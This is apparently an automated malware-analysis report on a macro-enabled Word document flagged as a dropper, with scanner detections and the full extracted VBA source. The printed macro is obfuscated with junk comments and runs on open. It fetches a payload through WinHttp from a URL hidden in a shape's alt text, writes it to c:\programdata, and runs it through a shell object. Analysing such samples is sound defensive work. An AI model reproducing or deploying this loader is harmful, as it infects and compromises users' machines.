Verdict: MALICIOUS
Risk Score: 170
Heuristics: 6

- ClamAV: Doc.Dropper.Generic-9823539-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Generic-9823539-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): Document contains a VBA project — VBA macros present
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set uFtqv = CreateObject("WinHttp.WinHttpRequest.5.1")`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2014/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/ink (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2017/model3d (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2018/wordml/cex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2016/wordml/cid (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2018/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2015/wordml/symex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)

  Note: every URL in this list is a standard Office Open XML / DrawingML namespace identifier declared in the document markup, not an address the macro contacts; the download target the macro uses is not among them.
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 10418 bytes |

SHA-256 (macros.bas): e9275778cdba96f12f52f2dab8dfcda5e61d821938cd3dc4960209d83ab5bb6d

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "MAyXI"
Sub HNany(tPLJO, Optional ByVal tTCkD As String = "c:\programdata\aSKUC.pdf")
' Indole repacking
' Horticulturist unstable speedcop rockbottom
' Position eliminated cavalry
' Ineffectual mouthorgan gilt buttock
' Rhythmic buckling masterpieces aupair actives refutes
' Mosses giltedged leukaemia river eliminator complicated
' Rucks mourning inhalers mordant refuges
' Medieval
' Sarcophagi
' Halftruths bypasses
' Yelpings defamation oversubscribed egomaniacs
' Normality carborundum discharged
' Rubies geriatrics
' Occipital dermatological reciting psalmody
' Prophylaxis grizzled scale tarred procrastinator
' Chits winger thumping dislocating
' Outbreaks seamail enshrine stationer clobber shekels entrench
' Human compulsorily traded reallocating fluorescence collier
' Withdrew consolidate misinterpretation numberless
' Organism oast
' Bloodline
' Boring punter technological lugs
' Cached misinterpret beneficiaries
' Unoriginality reducibility
' Grain
' Educator
' Minedetector costive biennials picking power
' Metallic partnering infractions
' Underwood
' Mercilessly woolliness skinner tawdry
' Unprincipled nationalist wigging censuring pillion
' Defecting gawk coronations tangerines confiscating synovial
' Agglomerated stoics rowing ordaining theatre
' Directives hawaiian darkening
' Starlit underlined
' Splattering innocence encryption glucose scramble
' Tweeter flexion
' Heartening fulfilment publicises
mjsnK = tTCkD
Open mjsnK For Output As #1
' Woolliness
' Hypnotherapists passers pint stealers ravage
' Darkest comprises semifinal sleepwalking
' Snappy childishly ascribes unceasingly
Print #1, tPLJO
' Deliberately
' Rely
' Hark legitimated ballerina alaska bluffer mechanise viewable
' Pyjamas hesitations
' Impenetrably marvel triptych operating wainscot
Close #1
End Sub
' Bylaw toaster design collides
' Weatherproof bespeak seducers pityingly
' Facials coercions bogeyman handhold
' Ordained
Sub AutoOpen()
' Sissy butter tonedeaf dipolar females
' Shadow brilliantly pondered basify
' Antitheses lodge
' Running blackmails backpedalling compartment
' Emigre licentious civility
' Primogeniture landholding irremovable congruity
' Testiness pensioned informers pachyderm wreaks earlobes
' Chronologically tombola timings cayman
' Alterations betide consecration prematurity raindrops
' Flourished multinationals updater babylon intermolecular
' Zionist
' Sahib malice creole
' Chimaera ladles edict drays
' Relaxes mainland
' Inordinate quantifier audiovisual convened
' Blue pebbles dimensioned
' Flints shoes
' Beakers rephrasing labours
' Overplay supine defiling forgives
' Masterful bespeaks manslaughter
' Keystroke
' Dive communicable enneads
' Aubergines rudderless congealed showery
' Polewards tuns jock nagged caldera
' Improved
' Biker petrification advise
' Mindbogglingly ascriptions
' Contracts overheated humdrum
' Censured spirant absolution pawn hairbrush
' Barricades horsebox overtures roughened tidying
Dim PgjVU As New umKCU
' Dummied
' Baggages aristocracy impersonator
' Waistband baking culls
' Unsighted crossbred
' Rapists textiles unclenching unpopulated
tPLJO = PgjVU.VIDjf()
' Cruelties
' Bobbles barker reassemble disrespectfully
' Dishpan newsletters
' Relabellings fricatives expended squawking converts
' Trespassing
HNany zykxa(tPLJO)
' Ribbed physiologist
' Baptises actionable gaiter
' Singing revisit embalmed
' Fief earthwards oversee fetishism
' Militated beseeches
' Reprimanded toiler regulates quenchers month
' Protectorates pornography glooms benefactors
' Hurting goth
' Genets tuning definiteness
' Inquisitions
' Transferred dustman scrabbling weighing saunter doldrums
' Projection greenhorn inlet
' Twinkles fragmented
' Reclaimable gnarled rounded corruptions
IZPoz bSOlV(0) + "r32 c:\programdata\aSKUC.pdf", ""
End Sub
Function TsniH(eshoo, WtwvD)
' Posterity employ lit
' Branches heterosexuals shrinking endive
' Tincan anything
' Gibed malaysia
' June inflects
TsniH = Split(eshoo, WtwvD)
End Function
Attribute VB_Name = "tMnde"
' Slat crooners sacristy cofferdams
' Chaser mockups
' Respected plus
' Disbursement
' Mouthpieces disparities
Function zykxa(zvLtx)
' Reproducibly charm repays warded
' Guardedly foiling whether
' Dispensations prosecutor
' Reconsult inlaws uvula
' Frightening
' Maturing
zykxa = StrConv(zvLtx, vbUnicode)
' Jowl canonise bailout
' Secondclass mileage resetting
' Strayer dualistic
' Republicans premising
' Leasehold direct gold skincare absurdest voteless
' Quickness pollens
' Listed keystrokes officials prevent referendum decadent
End Function
' Maddened populace
' Improving gruffly circumspection parables
' Chirped proximate improvable microsurgery bestial
' Torches garottes howitzer
' Retraced entitled converted ingratitude screenplay
' Gibbered ponies abalone
Function Apsqe()
' Occupy threaded guilders
' Refuels bigot
' Quavering fondant interceptor
' Toilette meromorphic collier wellmade
' Slime boson ravels hopefully
' Quarts messiest waltzing
' Skeptic assay catchword
' Recapitulate sinter embarrasses debunk
' Distance neared
' Voyeur buoyantly subtropical
' Paperthin overtakes operands disputants
' Plums reminisces skylines sumptuously wrested
' Assayed orthopaedics
Apsqe = ActiveDocument.shapes(1).AlternativeText
End Function
' Escape how
' Vertical evangelists impinging slouch nonconformity
' Viler bake greening stretching
' Downgrade pianists cinematographer
' Recharges comprising
' Corporeally
Function bSOlV(wzzsK)
' Collapsed
' Rescale resolving securing telecommuting distinctive ethic
' Retinues bountifully
' Wives accusations incoherence tint promissory
' Contours stupid observer hawking frictions
' Brecciated rejuvenated sidestep relegation
' Dacha winces repeatable associateship extrapolation
' Asiatic
' Overshoot inflatable
' Kerbside commitment teepee
EAWSz = Apsqe()
dLxQC = TsniH(EAWSz, "kristi")
Qwptg = dLxQC(wzzsK)
bSOlV = Qwptg
End Function
Attribute VB_Name = "umKCU"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Unalike puritanism convalescence
' Reabsorb encourage uninjured worded distanced waring
' Dismembered elal backfiring entangled grafting
' Assemblages inapplicability tickled adopt
' Crust pulverise
' Amused kerb
' Yet heedlessness
Function VIDjf()
' Poetess luckless laird
' Wingers unblinkingly mockery ramping
' Cerebrum submerged unto
' Ruggedly inveigh stitched unreferencing sessile
' Haemorrhagic ridges eritrea aloud
Dim uFtqv As Object
' Binodal debriefing implementations
' Splash holiest keeping
' Studentship
' Juniper reversion pack stories tonalities
' Porridge quickest submersible rearming oxidisation battens
' Headwind embarrassedly paradigms
Set uFtqv = CreateObject("WinHttp.WinHttpRequest.5.1")
' Exiguous misrepresentation glycine heartrending
' Relives coexists
' Stipples
' Wears zoology minimises dictation soldiering beaching
' Looter monkey contemplates
' Antechamber
' Sprawl cripple inspections
' Spontaneously nooses bobtail
' Selfconfidence doubledealing emotional
' Salaried quartermaster
' Backhanded
' Shunters
' Validate springboard scudded midevening profitably
' Easiness pugilistic doings dissonant
' Impending stopgap multiphase fomenting
' Definably
' Harshest formulated emporia vulnerable
' Commuting insincerity
' Bewitch ruling
' Bursaries
' Cobweb noosed refrains clogging napalm
' Desertification
RNRtY = bSOlV(1)
' Conversations picnicked reviews napping
' Impersonated
' Maverick radium cosines tracksuit
' Redemption emancipating polishes sledge
' Groups voyaging jurisprudential
uFtqv.Open "GET", RNRtY, False
' Play frauds
' Digitalis lacrosse bluntest
' Archaeologist proletarians
' Exposures reads technocratic initially plasma deleting
' Rafts bestrode
uFtqv.Send
' Overdid photographers
' Urbanising entrap problematically maine
' Libels passive parliamentarians
' Roam electorally
' Insincerely wildoats incapacitate
VIDjf = uFtqv.responsebody
End Function
Attribute VB_Name = "oYPmW"
Sub IZPoz(OotCy, lgpVX)
' Exchangers surfactants
' Metamorphism skullcap postmistress proclamation
' Brutus allurements alludes pandemic
' Congruence unwelcome eclair
' Queer unenthusiastically
' Whisperings shoulders alterable bola
' Dunces lit tools housings appropriates
' Chancy treatise internalise propositioned constrictors
' Billiard
' Procession coffers refine
' Hire launder synapse bawdy importable
Set bGEiD = CreateObject(lgpVX + bSOlV(2) + "ll").exec(OotCy)
' Chromatic
' Outbred cheapened invisibles
' Legacy slimmer investigate
' Abstracts glaringly escarpment wadi
' Engraver braid heretics
' Capering
' Strainers aegean
' Fouled robotics enriches
' Gloating bough aperitif
' Telegraphic oblivious misdeed whirled
' Creator carburettor yesterdays
' Replied glowing narrowmindedness
' Shafting scooter burbles spire chameleon
' Friend
' Encore fade
' Inequities obscurer gristle recognisable upside
' Deify soaping
' Laboured professorial kinswoman
' Pools plateaux probabilities
' Spit tediums edit
' Squaring aggressors stew
' Disloyal witchlike
' Trays shallots wrestlers
' Zebra undermined spurns beanie unexpressed
' Baitings scarcest leaks photosphere voltage
' Dislocated cytotoxic knuckleduster
' Pigsty
' Surreptitiously leap jiggle overmuch
' Instrumented thermostat groping begrudgingly effectively predecessors
' Roughly peevishly printings
' Unforced increasing intemperance disfranchise
' Objections sucking
' Mediators articles amicably concordance
' Sevens portal invited
' Bestride slipway announcements
' Blurted falsifications purees recoveries fuller
' Analyst pajama needier
' Purple ledges
End Sub

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 40960 bytes |

SHA-256 (vbaProject_00.bin): b23ff36499c5dfc42bfa1a30762119a08dc872ad58181592dbdf4035870a7216